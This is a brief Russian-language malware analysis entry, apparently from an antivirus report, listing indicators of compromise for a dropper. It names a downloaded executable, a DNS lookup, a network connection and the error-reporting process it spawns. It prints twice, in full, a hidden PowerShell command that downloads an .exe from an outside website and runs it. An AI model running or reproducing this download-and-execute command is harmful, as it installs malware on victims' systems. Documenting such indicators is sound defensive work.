Техническая информация
- http://www.travelliteindia.com/cef91t.exe как %temp%\qweqwe.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.travelliteindia.com/cef91t.exe','%TMP%\qweqwe.exe');Start-Process '%TMP%\qweqwe.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1408
- %TEMP%\1000684.cvr
- 'tr####liteindia.com':80
- http://www.tr####liteindia.com/cef91t.exe
- DNS ASK tr####liteindia.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.travelliteindia.com/cef91t.exe','%TMP%\qweqwe.exe');Start-Process '%TMP%\qweqwe.exe';' (со скрытым окном)